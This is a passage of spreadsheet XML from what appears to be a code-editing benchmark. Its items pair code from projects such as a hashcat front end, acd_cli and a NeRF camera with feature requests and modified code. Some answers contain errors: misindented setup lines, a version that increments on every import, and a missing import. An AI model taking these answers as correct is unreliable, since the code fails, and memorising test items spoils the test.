disc_loss'}</t>
  </si>
  <si>
    <t>{'called_code_segment': "class ShellLogModel(db.Model):\n    __tablename__ = 'shell_logs'\n    id = db.Column(db.Integer, primary_key=True)\n    user_id = db.Column(db.Integer, default=0, index=True, nullable=True)\n    command = db.Column(db.Text, nullable=True)\n    output = db.Column(db.Text, nullable=True)\n    executed_at = db.Column(db.DateTime, nullable=True, default=datetime.datetime.now())\n    finished_at = db.Column(db.DateTime, nullable=True)", 'invoking_code_segment': 'from app.lib.models import user, config, sessions, hashcat, api, system, webpush', 'feature_description': "Add a new 'status' field to the ShellLogModel to track the status of shell command execution (e.g., 'pending', 'running', 'completed', 'failed')", 'modified_complete_code': "# File 1: crackerjack/app/lib/models/system.py\nfrom app import db\nimport datetime\n\n\nclass ShellLogModel(db.Model):\n    __tablename__ = 'shell_logs'\n    id = db.Column(db.Integer, primary_key=True)\n    user_id = db.Column(db.Integer, default=0, index=True, nullable=True)\n    command = db.Column(db.Text, nullable=True)\n    output = db.Column(db.Text, nullable=True)\n    executed_at = db.Column(db.DateTime, nullable=True, default=datetime.datetime.now())\n    finished_at = db.Column(db.DateTime, nullable=True)\n    #New status field to track shell command execution status\n    status = db.Column(db.String(50), default='pending', nullable=False, index=True)\n\n\n# File 2: crackerjack/app/__init__.py\n# The import statement remains the same:\nfrom app.lib.models import user, config, sessions, hashcat, api, system, webpush\n\n# #Modify - When creating or updating ShellLogModel instances in controllers/services,\n# the status field should be initialized and updated accordingly:\n# Example usage pattern (to be implemented in relevant controllers):\n# shell_log = system.ShellLogModel(\n#     user_id=user_id,\n#     command=command,\n#     status='pending'  # #New - Initialize with pending status\n# )\n# db.session.add(shell_log)\n# db.session.commit()\n#\n# # #Modify - Update status when execution starts\n# shell_log.status = 'running'\n# db.session.commit()\n#\n# # #Modify - Update status and output when execution completes\n# shell_log.status = 'completed'\n# shell_log.output = command_output\n# shell_log.finished_at = datetime.datetime.now()\n# db.session.commit()"}</t>
  </si>
  <si>
    <t>{'file1': "from app import db\nimport datetime\nfrom enum import Enum\n\n#Modify: Added StatusEnum\nclass StatusEnum(Enum):\n    PENDING = 'pending'\n    RUNNING = 'running'\n    COMPLETED = 'completed'\n    FAILED = 'failed'\n\nclass ShellLogModel(db.Model):\n    __tablename__ = 'shell_logs'\n    id = db.Column(db.Integer, primary_key=True)\n    user_id = db.Column(db.Integer, default=0, index=True, nullable=True)\n    command = db.Column(db.Text, nullable=True)\n    output = db.Column(db.Text, nullable=True)\n    executed_at = db.Column(db.DateTime, nullable=True, default=datetime.datetime.now())\n    finished_at = db.Column(db.DateTime, nullable=True)\n    #Modify: Added status field\n    status = db.Column(db.Enum(StatusEnum), default=StatusEnum.PENDING, nullable=False)", 'file2': 'import os\nimport datetime\nfrom flask import Flask, session, render_template, request\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_migrate import Migrate\nfrom flask_login import LoginManager\nfrom flask_wtf.csrf import CSRFProtect\nfrom flask_crontab import Crontab\nfrom app import version\n\n\ndb = SQLAlchemy()\nmigrate = Migrate()\nlogin = LoginManager()\nlogin.login_view = \'auth.login\'\ncsrf = CSRFProtect()\ncrontab = Crontab()\n\n\ndef create_app(config_class=None):\n    # Make sure the instance path is within the ./data folder.\n    data_instance_path = os.path.realpath(os.path.join(os.path.dirname(os.path.realpath(__file__)), \'..\', \'data\', \'instance\'))\n\n    app = Flask(__name__, instance_path=data_instance_path, instance_relative_config=True)\n\n    try:\n        os.makedirs(app.instance_path)\n    except OSError:\n        pass\n\n    # First we load everything we need in order to end up with a working app.\n    app.config[\'SQLALCHEMY_DATABASE_URI\'] = \'sqlite:///\' + os.path.join(app.instance_path, \'crackerjack.sqlite3\')\n    app.config[\'SQLALCHEMY_TRACK_MODIFICATIONS\'] = False\n    app.config[\'SECRET_KEY\'] = \'ThisIsNotTheKeyYouAreLookingFor\'\n    app.config[\'SESSION_COOKIE_HTTPONLY\'] = True\n    # The referrer is disabled further down in the response headers.\n    app.config[\'WTF_CSRF_SSL_STRICT\'] = False\n\n    # And now we override any custom settings from config.cfg if it exists.\n    app.config.from_pyfile(\'config.py\', silent=True)\n\n    app.config[\'CRACKERJACK_VERSION\'] = version.__version__\n\n    # If we have passed any object on app creation (ie testing), override here.\n    if config_class is not None:\n        app.config.from_object(config_class)\n\n    db.init_app(app)\nmigrate.init_app(app, db)\nlogin.init_app(app)\ncsrf.init_app(app)\ncrontab.init_app(app)\n\n    from app.controllers.home import bp as home_bp\n    app.register_blueprint(home_bp, url_prefix=\'/\')\n\n    from app.controllers.auth import bp as auth_bp\n    app.register_blueprint(auth_bp, url_prefix=\'/auth\')\n\n    from app.controllers.sessions import bp as sessions_bp\n    app.register_blueprint(sessions_bp, url_prefix=\'/sessions\')\n\n    from app.controllers.install import bp as install_bp\n    app.register_blueprint(install_bp, url_prefix=\'/install\')\n\n    from app.controllers.api import bp as api_bp\n    app.register_blueprint(api_bp, url_prefix=\'/api/v1\')\n    csrf.exempt(api_bp)\n\n    from app.controllers.webpush import bp as webpush_bp\n    app.register_blueprint(webpush_bp, url_prefix=\'/webpush\')\n\n    from app.controllers.modules import bp as modules_bp\n    app.register_blueprint(modules_bp)\n\n    from app.controllers.config import bp as config_bp\n    app.register_blueprint(config_bp)\n\n    from app.lib.base.provider import Provider\n\n    # This is to be able to access settings from any template (shared variables).\n    @app.context_processor\n    def processor():\n        def setting_get(name, default=None):\n            provider = Provider()\n            return provider.settings().get(name, default)\n\n        def user_setting_get(user_id, name, default=None):\n            provider = Provider()\n            return provider.user_settings().get(user_id, name, default)\n\n        def template():\n            provider = Provider()\n            return provider.template()\n\n        def basename(path):\n            return os.path.basename(path)\n\n        return dict(setting_get=setting_get, user_setting_get=user_setting_get, template=template, basename=basename)\n\n    @app.before_request\n    def before_request():\n        skip_session_update = False\n\n        if \'/static/\' in request.path:\n            # Exclude session updates for /static/ URLs\n            skip_session_update = True\n        elif skip_session_update is False and request.endpoint in app.view_functions:\n            # Exclude session updates for views that have @dont_update_session (is status checked in sessions).\n            view_function = app.view_functions[request.endpoint]\n            skip_session_update = hasattr(view_function, \'_dont_update_session\')\n\n        if skip_session_update is False:\n            session.permanent = True\n            app.permanent_session_lifetime = datetime.timedelta(minutes=20)\n            session.modified = True\n\n    @app.after_request\n    def after_request(response):\n        response.headers[\'Server\'] = \'Windows 98\'\n        response.headers[\'X-Frame-Options\'] = \'DENY\'\n        response.headers[\'X-XSS-Protection\'] = \'1; mode=block\'\n        response.headers[\'X-Content-Type-Options\'] = \'nosniff\'\n        response.headers[\'Referrer-Policy\'] = \'no-referrer\'\n        return response\n\n    @app.errorhandler(500)\n    def internal_error(error):\n        return render_template(\'errors/500.html\', error=error), 500\n\n    @app.errorhandler(404)\n    def page_not_found(error):\n        return render_template(\'errors/404.html\', error=error), 404\n\n    @crontab.job(minute="*/5")\n    def cron():\n        provider = Provider()\n        cron = provider.cron()\n        cron.run()\n\n    return app\n\n\n# This has to be at the bottom.\nfrom app.lib.models import user, config, sessions, hashcat, api, system, webpush\n\n#New: Added StatusEnum to the import list\nfrom app.lib.models.system import StatusEnum'}</t>
  </si>
  <si>
    <t>{'called_code_segment': "__version__ = '0.3.2'", 'invoking_code_segment': 'version = acdcli.__version__\nStrictVersion(version)', 'feature_description': 'Add a feature to automatically increment the version number when a new release is made. This feature will parse the current version, increment the patch version number, and update the __init__.py file with the new version.', 'modified_complete_code': '# File 1: acd_cli/acdcli/__init__.py\n__version__ = \'0.3.2\'\n\n# New: Function to increment version\ndef increment_version(version_string: str) -&gt; str:\n    """Increment the patch version number."""\n    parts = version_string.split(\'.\')\n    parts[-1] = str(int(parts[-1]) + 1)\n    return \'.\'.join(parts)\n\n# New: Function to update version in __init__.py\ndef update_version_file(new_version: str) -&gt; None:\n    """Update the version in __init__.py file."""\n    import os\n    init_file = os.path.join(os.path.dirname(__file__), \'__init__.py\')\n    with open(init_file, \'r\', encoding=\'utf-8\') as f:\n        content = f.read()\n    content = content.replace(f"__version__ = \'{__version__}\'", f"__version__ = \'{new_version}\'")\n    with open(init_file, \'w\', encoding=\'utf-8\') as f:\n        f.write(content)\n\n---\n\n# File 2: acd_cli/setup.py\nimport os\nimport re\nimport sys\nfrom setuptools import setup, find_packages\nfrom distutils.version import StrictVersion\nimport acdcli\n\ndef read(fname: str) -&gt; str:\n    return open(os.path.join(os.path.dirname(__file__), fname), encoding=\'utf-8\').read()\n\n# Modify: Replace GitHub external links\nrepl = (\'`([^`]*?) &lt;(docs/)?(.*?)\\.rst&gt;`_\',\n        \'`\\g&lt;1&gt; &lt;https://acd-cli.readthedocs.org/en/latest/\\g&lt;3&gt;.html&gt;`_\')\n\n# Modify: Get version and support auto-increment\nversion = acdcli.__version__\nStrictVersion(version)\n\n# New: Auto-increment version on release (can be triggered by environment variable)\nif os.environ.get(\'RELEASE_NEW_VERSION\') == \'True\':\n    new_version = acdcli.increment_version(version)\n    acdcli.update_version_file(new_version)\n    version = new_version\n\nrequests_py32 = \',&lt;2.11.0\' if sys.version_info[0:2] == (3, 2) else \'\'\n\ndependencies = [\'appdirs\', \'colorama\', \'fusepy\', \'python_dateutil\',\n                \'requests&gt;=2.1.0,!=2.9.0,!=2.12.0%s\' % requests_py32, \'requests_toolbelt!=0.5.0\']\ndoc_dependencies = [\'sphinx_paramlinks\']\ntest_dependencies = [\'httpretty&lt;0.8.11\', \'mock\']\n\nif os.environ.get(\'READTHEDOCS\') == \'True\':\n    dependencies = doc_dependencies\n\nsetup(\n    name=\'acdcli\',\n    version=version,\n    description=\'a command line interface and FUSE filesystem for Amazon Cloud Drive\',\n    long_description=re.sub(repl[0], repl[1], read(\'README.rst\')),\n    license=\'GPLv2+\',\n    author=\'yadayada\',\n    author_email=\'acd_cli@mail.com\',\n    keywords=[\'amazon cloud drive\', \'clouddrive\', \'FUSE\'],\n    url=\'https://github.com/yadayada/acd_cli\',\n    download_url=\'https://github.com/yadayada/acd_cli/tarball/\' + version,\n    zip_safe=False,\n    packages=find_packages(exclude=[\'tests\']),\n    test_suite=\'tests.get_suite\',\n    scripts=[\'acd_cli.py\'],\n    entry_points={\'console_scripts\': [\'acd_cli = acd_cli:main\', \'acdcli = acd_cli:main\']},\n    install_requires=dependencies,\n    tests_require=test_dependencies,\n    extras_require={\'docs\': doc_dependencies},\n    classifiers=[\n        \'Environment :: Console\',\n        \'License :: OSI Approved :: GNU General Public License v2 or later (GPLv2+)\',\n        \'Programming Language :: Python :: 3\',\n        \'Programming Language :: Python :: 3.2\',\n        \'Programming Language :: Python :: 3.3\',\n        \'Programming Language :: Python :: 3.4\',\n        \'Programming Language :: Python :: 3.5\',\n        \'Programming Language :: Python :: 3.6\',\n        \'Programming Language :: Python :: 3 :: Only\',\n        \'Development Status :: 4 - Beta\',\n        \'Topic :: System :: Archiving :: Backup\',\n        \'Topic :: System :: Filesystems\'\n    ]\n)'}</t>
  </si>
  <si>
    <t>{'acd_cli/acdcli/__init__.py': "#Modify\ndef get_version():\n    major, minor, patch = map(int, __version__.split('.'))\n    patch += 1\n    return f'{major}.{minor}.{patch}'\n\n#Modify\n__version__ = get_version()", 'acd_cli/setup.py': '#Modify\nversion = acdcli.get_version()\nStrictVersion(version)'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'class MADE(nn.Module):\n    def __init__(self, nin, hidden_sizes, nout, num_masks=1, natural_ordering=False):\n        ...\n        self.seed = 0\n        self.update_masks()\n    \n    def update_masks(self):\n        if self.m and self.num_masks == 1: return\n        L = len(self.hidden_sizes)\n        rng = np.random.RandomState(self.seed)\n        self.seed = (self.seed + 1) % self.num_masks\n        ...', 'invoking_code_segment': "def run_epoch(split, upto=None):\n    ...\n    for step in range(nsteps):\n        ...\n        if step % args.resample_every == 0 or split == 'test':\n            model.update_masks()\n        xbhat += model(xb)\n        ...", 'feature_description': 'Add a feature to log the current seed used for mask generation during training. This includes modifying the MADE class to track and expose the current seed value, and updating the run_epoch function to log this seed information during training.', 'modified_complete_code': '# File 1: pytorch-made/made.py - Modified MADE class\nclass MADE(nn.Module):\n    def __init__(self, nin, hidden_sizes, nout, num_masks=1, natural_ordering=False):\n        super().__init__()\n        self.nin = nin\n        self.nout = nout\n        self.hidden_sizes = hidden_sizes\n        assert self.nout % self.nin == 0, "nout must be integer multiple of nin"\n        \n        self.net = []\n        hs = [nin] + hidden_sizes + [nout]\n        for h0,h1 in zip(hs, hs[1:]):\n            self.net.extend([\n                    MaskedLinear(h0, h1),\n                    nn.ReLU(),\n                ])\n        self.net.pop()\n        self.net = nn.Sequential(*self.net)\n        \n        self.natural_ordering = natural_ordering\n        self.num_masks = num_masks\n        self.seed = 0\n        #New: Add attribute to track current seed for logging\n        self.current_seed = 0\n        \n        self.m = {}\n        self.update_masks()\n        \n    def update_masks(self):\n        if self.m and self.num_masks == 1: return\n        L = len(self.hidden_sizes)\n        \n        rng = np.random.RandomState(self.seed)\n        #Modify: Store current seed before incrementing for logging purposes\n        self.current_seed = self.seed\n        self.seed = (self.seed + 1) % self.num_masks\n        \n        self.m[-1] = np.arange(self.nin) if self.natural_ordering else rng.permutation(self.nin)\n        for l in range(L):\n            self.m[l] = rng.randint(self.m[l-1].min(), self.nin-1, size=self.hidden_sizes[l])\n        \n        masks = [self.m[l-1][:,None] &lt;= self.m[l][None,:] for l in range(L)]\n        masks.append(self.m[L-1][:,None] &lt; self.m[-1][None,:])\n        \n        if self.nout &gt; self.nin:\n            k = int(self.nout / self.nin)\n            masks[-1] = np.concatenate([masks[-1]]*k, axis=1)\n        \n        layers = [l for l in self.net.modules() if isinstance(l, MaskedLinear)]\n        for l,m in zip(layers, masks):\n            l.set_mask(m)\n    \n    #New: Add method to get current seed for logging\n    def get_current_seed(self):\n        return self.current_seed\n    \n    def forward(self, x):\n        return self.net(x)\n\n# File 2: pytorch-made/run.py - Modified run_epoch function\ndef run_epoch(split, upto=None):\n    torch.set_grad_enabled(split==\'train\')\n    model.train() if split == \'train\' else model.eval()\n    nsamples = 1 if split == \'train\' else args.samples\n    x = xtr if split == \'train\' else xte\n    N,D = x.size()\n    B = 100\n    nsteps = N//B if upto is None else min(N//B, upto)\n    lossfs = []\n    for step in range(nsteps):\n        \n        xb = Variable(x[step*B:step*B+B])\n        \n        xbhat = torch.zeros_like(xb)\n        for s in range(nsamples):\n            if step % args.resample_every == 0 or split == \'test\':\n                model.update_masks()\n                #New: Log the current seed used for mask generation\n                current_seed = model.get_current_seed()\n                print("[%s] step %d: mask seed = %d" % (split, step, current_seed))\n            xbhat += model(xb)\n        xbhat /= nsamples\n        \n        loss = F.binary_cross_entropy_with_logits(xbhat, xb, size_average=False) / B\n        lossf = loss.data.item()\n        lossfs.append(lossf)\n        \n        if split == \'train\':\n            opt.zero_grad()\n            loss.backward()\n            opt.step()\n        \n    print("%s epoch average loss: %f" % (split, np.mean(lossfs)))'}</t>
  </si>
  <si>
    <t>### File 2: run.py
#Modify
def run_epoch(split, upto=None):
    torch.set_grad_enabled(split=='train') # enable/disable grad for efficiency of forwarding test batches
    model.train() if split == 'train' else model.eval()
    nsamples = 1 if split == 'train' else args.samples
    x = xtr if split == 'train' else xte
    N,D = x.size()
    B = 100 # batch size
    nsteps = N//B if upto is None else min(N//B, upto)
    lossfs = []
    for step in range(nsteps):
        # fetch the next batch of data
        xb = Variable(x[step*B:step*B+B])
        # get the logits, potentially run the same batch a number of times, resampling each time
        xbhat = torch.zeros_like(xb)
        for s in range(nsamples):
            # perform order/connectivity-agnostic training by resampling the masks
            if step % args.resample_every == 0 or split == 'test': # if in test, cycle masks every time
                model.update_masks()
            # forward the model
            xbhat += model(xb)
        xbhat /= nsamples
        # evaluate the binary cross entropy loss
        loss = F.binary_cross_entropy_with_logits(xbhat, xb, size_average=False) / B
        lossf = loss.data.item()
        lossfs.append(lossf)
        # backward/update
        if split == 'train':
            opt.zero_grad()
            loss.backward()
            opt.step()
    print("%s epoch average loss: %f" % (split, np.mean(lossfs)))
#New
    if split == 'train':
        print("Current seed used for mask generation: %d" % model.get_current_seed())</t>
  </si>
  <si>
    <t>{'called_code_segment': "def index():\n    form = LinkForm()\n    if form.validate_on_submit():\n        url, max_sent = request.form.get('url'), request.form.get('max_sent')\n        language = 'english'\n        parser, meta = get_parser(url, Tokenizer(language))\n        new_meta = meta.pop('meta', {})\n        meta.update(new_meta)\n        session['summary'] = run_summarizer(parser, max_sent, language=language)\n        session['url'] = url\n        session['max_sent'] = max_sent\n        session['meta'] = meta\n        session['favicon'] = meta.get('favicon', '/favicon.ico')\n    return render_template('index.html', form=form, url=session.get('url'), max_sent=session.get('max_sent'), summary=session.get('summary'), meta=session.get('meta', {}), favicon=session.get('favicon', '/favicon.ico'))", 'invoking_code_segment': 'from . root import root', 'feature_description': 'Add a feature to allow users to select the summarization method (TextRank or LexRank) from the form and pass the selected method to the summarizer.', 'modified_complete_code': "# ExplainToMe/ExplainToMe/views/root.py\nimport json\n\ntry:\n    from collections import ChainMap\nexcept ImportError:\n    from chainmap import ChainMap\n\nfrom sumy.nlp.tokenizers import Tokenizer\nfrom flask import Blueprint, render_template, request, session\nfrom flask import current_app as app\n\ntry:\n    from collections import ChainMap\nexcept ImportError:\n    from chainmap import ChainMap\n\nfrom .. forms import LinkForm\nfrom .. textrank import get_parser, run_summarizer\n\nroot = Blueprint('root', __name__)\n\n@root.route('/', methods=['GET', 'POST'])\ndef index():\n    form = LinkForm()\n    if form.validate_on_submit():\n        url, max_sent = request.form.get('url'), request.form.get('max_sent')\n        #Modify: Add method selection from form\n        method = request.form.get('method', 'textrank')\n        language = 'english'\n        parser, meta = get_parser(url, Tokenizer(language))\n        new_meta = meta.pop('meta', {})\n        meta.update(new_meta)\n        #Modify: Pass method parameter to run_summarizer\n        session['summary'] = run_summarizer(parser, max_sent, language=language, method=method)\n        session['url'] = url\n        session['max_sent'] = max_sent\n        session['meta'] = meta\n        session['favicon'] = meta.get('favicon', '/favicon.ico')\n        #New: Store selected method in session\n        session['method'] = method\n\n    return render_template('index.html',\n                           form=form,\n                           url=session.get('url'),\n                           max_sent=session.get('max_sent'),\n                           summary=session.get('summary'),\n                           meta=session.get('meta', {}),\n                           favicon=session.get('favicon', '/favicon.ico'),\n                           #New: Pass method to template\n                           method=session.get('method', 'textrank'))\n\n# ExplainToMe/ExplainToMe/views/__init__.py\nfrom . api import api\nfrom . root import root\n# No changes needed in __init__.py as it only imports the blueprint"}</t>
  </si>
  <si>
    <t>{'root.py': "from flask import Blueprint, render_template, request, session\nfrom flask import current_app as app\n\nfrom .. forms import LinkForm\nfrom .. textrank import get_parser, run_summarizer\n\nroot = Blueprint('root', __name__)\n\n@root.route('/', methods=['GET', 'POST'])\ndef index():\n    form = LinkForm()\n    if form.validate_on_submit():\n        url, max_sent = request.form.get('url'), request.form.get('max_sent')\n        summarization_method = request.form.get('summarization_method', 'TextRank')  #Modify\n        language = 'english'\n        parser, meta = get_parser(url, Tokenizer(language))\n        new_meta = meta.pop('meta', {})\n        meta.update(new_meta)\n        session['summary'] = run_summarizer(parser, max_sent, language=language, method=summarization_method)  #Modify\n        session['url'] = url\n        session['max_sent'] = max_sent\n        session['meta'] = meta\n        session['favicon'] = meta.get('favicon', '/favicon.ico')\n\n    return render_template('index.html',\n                           form=form,\n                           url=session.get('url'),\n                           max_sent=session.get('max_sent'),\n                           summary=session.get('summary'),\n                           meta=session.get('meta', {}),\n                           favicon=session.get('favicon', '/favicon.ico'))", 'forms.py': "from flask_wtf import FlaskForm\nfrom wtforms import StringField, IntegerField, SelectField  #Modify\nfrom wtforms.validators import DataRequired, URL, NumberRange\n\nclass LinkForm(FlaskForm):\n    url = StringField('URL', validators=[DataRequired(), URL()])\n    max_sent = IntegerField('Max Sentences', validators=[DataRequired(), NumberRange(min=1, max=100)])\n    summarization_method = SelectField('Summarization Method', choices=[('TextRank', 'TextRank'), ('LexRank', 'LexRank')], default='TextRank')  #New"}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'class OrbitCamera:\n    def __init__(self, poses, r):\n        self.radius = r\n        self.center = np.zeros(3)\n        self.rot = poses[:3, :3]\n        self.rotate_speed = 0.8\n        self.res_defalut = poses\n        self.params_changed = True\n    \n    def orbit(self, dx, dy):\n        self.params_changed = True\n        rotvec_x = self.rot[:, 1] * np.radians(100*self.rotate_speed * dx)\n        rotvec_y = self.rot[:, 0] * np.radians(-100*self.rotate_speed * dy)\n        self.rot = R.from_rotvec(rotvec_y).as_matrix() @ R.from_rotvec(rotvec_x).as_matrix() @ self.rot', 'invoking_code_segment': "if window.is_pressed(ti.ui.RMB):\n    curr_mouse_x, curr_mouse_y = window.get_cursor_pos()\n    if last_orbit_x is None or last_orbit_y is None:\n        last_orbit_x, last_orbit_y = curr_mouse_x, curr_mouse_y\n    else:\n        dx = curr_mouse_x - last_orbit_x\n        dy = curr_mouse_y - last_orbit_y\n        self.cam.orbit(dx, -dy)\n        last_orbit_x, last_orbit_y = curr_mouse_x, curr_mouse_y\nelse:\n    last_orbit_x = None\n    last_orbit_y = None\n\nif window.is_pressed('w'):\n    self.cam.scale(0.2)\nif window.is_pressed('s'):\n    self.cam.scale(-0.2)\nif window.is_pressed('a'):\n    self.cam.pan(100, 0.)\nif window.is_pressed('d'):\n    self.cam.pan(-100, 0.)\nif window.is_pressed('e'):\n    self.cam.pan(0., -100)\nif window.is_pressed('q'):\n    self.cam.pan(0., 100)", 'feature_description': "Add a feature to allow the camera to tilt up and down using keyboard controls. This enables vertical rotation of the camera around the world X-axis, complementing the existing horizontal orbit functionality. Users can press 'r' to tilt up and 'f' to tilt down.", 'modified_complete_code': '# camera.py\nimport numpy as np\nfrom scipy.spatial.transform import Rotation as R\n\nclass OrbitCamera:\n    \'\'\'\n        OrbitCamera class from ngp_pl: https://github.com/kwea123/ngp_pl/blob/master/show_gui.py\n    \'\'\'\n    def __init__(self, poses, r):\n        self.radius = r\n        self.center = np.zeros(3)\n        # choose a pose as the initial rotation\n        self.rot = poses[:3, :3]\n\n        self.rotate_speed = 0.8\n        self.res_defalut = poses\n        self.params_changed = True\n\n    @property\n    def pose(self):\n        # first move camera to radius\n        res = np.eye(4)\n        res[2, 3] -= self.radius\n        # rotate\n        rot = np.eye(4)\n        rot[:3, :3] = self.rot\n        res = rot @ res\n        # translate\n        res[:3, 3] -= self.center\n        return res\n\n    def reset(self, pose=None):\n        self.params_changed = True\n        self.rot = np.eye(3)\n        self.center = np.zeros(3)\n        self.radius = 2.0\n        if pose is not None:\n            self.rot = pose.cpu().numpy()[:3, :3]\n\n    def orbit(self, dx, dy):\n        self.params_changed = True\n        rotvec_x = self.rot[:, 1] * np.radians(100*self.rotate_speed  * dx)\n        rotvec_y = self.rot[:, 0] * np.radians(-100*self.rotate_speed  * dy)\n        self.rot = R.from_rotvec(rotvec_y).as_matrix() @ \\\n                   R.from_rotvec(rotvec_x).as_matrix() @ \\\n                   self.rot\n\n    #New: Add tilt method for vertical camera rotation\n    def tilt(self, angle):\n        """Tilt camera up/down by rotating around world X-axis\n        Args:\n            angle: rotation angle in degrees (positive = tilt up, negative = tilt down)\n        """\n        self.params_changed = True\n        # Create rotation vector around world X-axis\n        rotvec_tilt = np.array([1.0, 0.0, 0.0]) * np.radians(100*self.rotate_speed * angle)\n        self.rot = R.from_rotvec(rotvec_tilt).as_matrix() @ self.rot\n\n    def scale(self, delta):\n        self.params_changed = True\n        self.radius *= 1.1 ** (-delta)\n\n    def pan(self, dx, dy, dz=0):\n        self.params_changed = True\n        self.center += 1e-4 * self.rot @ np.array([dx, dy, dz])\n\n\n# taichi_ngp.py - Modified render_gui method (relevant section)\n# In the render_gui method, modify the keyboard input handling section:\n\n            if window.is_pressed(ti.ui.RMB):\n                curr_mouse_x, curr_mouse_y = window.get_cursor_pos()\n                if last_orbit_x is None or last_orbit_y is None:\n                    last_orbit_x, last_orbit_y = curr_mouse_x, curr_mouse_y\n                else:\n                    dx = curr_mouse_x - last_orbit_x\n                    dy = curr_mouse_y - last_orbit_y\n                    self.cam.orbit(dx, -dy)\n                    last_orbit_x, last_orbit_y = curr_mouse_x, curr_mouse_y\n            else:\n                last_orbit_x = None\n                last_orbit_y = None\n\n            if window.is_pressed(\'w\'):\n                self.cam.scale(0.2)\n            if window.is_pressed(\'s\'):\n                self.cam.scale(-0.2)\n            if window.is_pressed(\'a\'):\n                self.cam.pan(100, 0.)\n            if window.is_pressed(\'d\'):\n                self.cam.pan(-100, 0.)\n            if window.is_pressed(\'e\'):\n                self.cam.pan(0., -100)\n            if window.is_pressed(\'q\'):\n                self.cam.pan(0., 100)\n            #New: Add tilt up/down controls\n            if window.is_pressed(\'r\'):\n                self.cam.tilt(0.2)\n            if window.is_pressed(\'f\'):\n                self.cam.tilt(-0.2)'}</t>
  </si>
  <si>
    <t xml:space="preserve">camera.py:
#Modify
class OrbitCamera:
    '''
        OrbitCamera class from ngp_pl: https://github.com/kwea123/ngp_pl/blob/master/show_gui.py
    '''
    def __init__(self, poses, r):
        self.radius = r
        self.center = np.zeros(3)
        # choose a pose as the initial rotation
        self.rot = poses[:3, :3]
        self.rotate_speed = 0.8
        self.res_defalut = poses
        self.params_changed = True
    @property
    def pose(self):
        # first move camera to radius
        res = np.eye(4)
        res[2, 3] -= self.radius
        # rotate
        rot = np.eye(4)
        rot[:3, :3] = self.rot
        res = rot @ res
        # translate
        res[:3, 3] -= self.center
        return res
    def reset(self, pose=None):
        self.params_changed = True
        self.rot = np.eye(3)
        self.center = np.zeros(3)
        self.radius = 2.0
        if pose is not None:
            self.rot = pose.cpu().numpy()[:3, :3]
    def orbit(self, dx, dy):
        self.params_changed = True
        rotvec_x = self.rot[:, 1] * np.radians(100*self.rotate_speed  * dx)
        rotvec_y = self.rot[:, 0] * np.radians(-100*self.rotate_speed  * dy)
        self.rot = R.from_rotvec(rotvec_y).as_matrix() @ \
                   R.from_rotvec(rotvec_x).as_matrix() @ \
                   self.rot
    def scale(self, delta):
        self.params_changed = True
        self.radius *= 1.1 ** (-delta)
    def pan(self, dx, dy, dz=0):
        self.params_changed = True
        self.center += 1e-4 * self.rot @ np.array([dx, dy, dz])
    #New
    def tilt(self, dy):
        self.params_changed = True
        rotvec_y = self.rot[:, 1] * np.radians(-100*self.rotate_speed  * dy)
        self.rot = R.from_rotvec(rotvec_y).as_matrix() @ self.rot
taichi_ngp.py:
#Modify
from camera import OrbitCamera
class NGP_fw:
    def __init__(self, grid_size, base_res, log2_T, res, level, exp_step_factor):
        ...
        self.default_rot = model['poses'][20].astype(np_type)[:3, :3]
        self.cam = OrbitCamera(self.default_rot, r=1.5)
        ...
    def render_gui(self):
        ...
        while window.running:
            ...
            if window.is_pressed(ti.ui.RMB):
                curr_mouse_x, curr_mouse_y = window.get_cursor_pos()
                if last_orbit_x is None or last_orbit_y is None:
                    last_orbit_x, last_orbit_y = curr_mouse_x, curr_mouse_y
                else:
                    dx = curr_mouse_x - last_orbit_x
                    dy = curr_mouse_y - last_orbit_y
                    self.cam.orbit(dx, -dy)
                    last_orbit_x, last_orbit_y = curr_mouse_x, curr_mouse_y
            else:
                last_orbit_x = None
                last_orbit_y = None
            if window.is_pressed('w'):
                self.cam.scale(0.2)
            if window.is_pressed('s'):
                self.cam.scale(-0.2)
            if window.is_pressed('a'):
                self.cam.pan(100, 0.)
            if window.is_pressed('d'):
                self.cam.pan(-100, 0.)
            if window.is_pressed('e'):
                self.cam.pan(0., -100)
            if window.is_pressed('q'):
                self.cam.pan(0., 100)
            #New
            if window.is_pressed('r'):
                self.cam.tilt(0.2)
            if window.is_pressed('f'):
                self.cam.tilt(-0.2)
            ...
            if self.cam.params_changed:
                self.rgb.fill(0.0)
                total_frame = 1
                self.cam.params_changed = False
                self.pose.from_numpy(self.cam.pose.astype(np_type))
            ...
</t>
  </si>
  <si>
    <t>{'called_code_segment': "def decode_predictions(preds, top_n=5):\n    '''Decode the output of a music tagger model.\n\n    # Arguments\n        preds: 2-dimensional numpy array\n        top_n: integer in [0, 50], number of items to show\n\n    '''\n    assert len(preds.shape) == 2 and preds.shape[1] == 50\n    results = []\n    for pred in preds:\n        result = zip(TAGS, pred)\n        result = sorted(result, key=lambda x: x[1], reverse=True)\n        results.append(result[:top_n])\n    return results", 'invoking_code_segment': "if __name__ == '__main__':\n    model = MusicTaggerCRNN(weights='msd')\n\n    audio_path = 'audio_file.mp3'\n    melgram = preprocess_input(audio_path)\n    melgrams = np.expand_dims(melgram, axis=0)\n\n    preds = model.predict(melgrams)\n    print('Predicted:')\n    print(decode_predictions(preds))", 'feature_description': 'Add a feature to allow the user to specify a custom list of tags for decoding predictions. This enables flexibility in using different tag sets beyond the default predefined TAGS list, making the decode_predictions function more reusable across different music tagging models or datasets.', 'modified_complete_code': "# audio_conv_utils.py\nimport numpy as np\nfrom keras import backend as K\n\n\nTAGS = ['rock', 'pop', 'alternative', 'indie', 'electronic',\n        'female vocalists', 'dance', '00s', 'alternative rock', 'jazz',\n        'beautiful', 'metal', 'chillout', 'male vocalists',\n        'classic rock', 'soul', 'indie rock', 'Mellow', 'electronica',\n        '80s', 'folk', '90s', 'chill', 'instrumental', 'punk',\n        'oldies', 'blues', 'hard rock', 'ambient', 'acoustic',\n        'experimental', 'female vocalist', 'guitar', 'Hip-Hop',\n        '70s', 'party', 'country', 'easy listening',\n        'sexy', 'catchy', 'funk', 'electro', 'heavy metal',\n        'Progressive rock', '60s', 'rnb', 'indie pop',\n        'sad', 'House', 'happy']\n\n\ndef librosa_exists():\n    try:\n        __import__('librosa')\n    except ImportError:\n        return False\n    else:\n        return True\n\n\ndef preprocess_input(audio_path, dim_ordering='default'):\n    '''Reads an audio file and outputs a Mel-spectrogram.\n    '''\n    if dim_ordering == 'default':\n        dim_ordering = K.image_dim_ordering()\n    assert 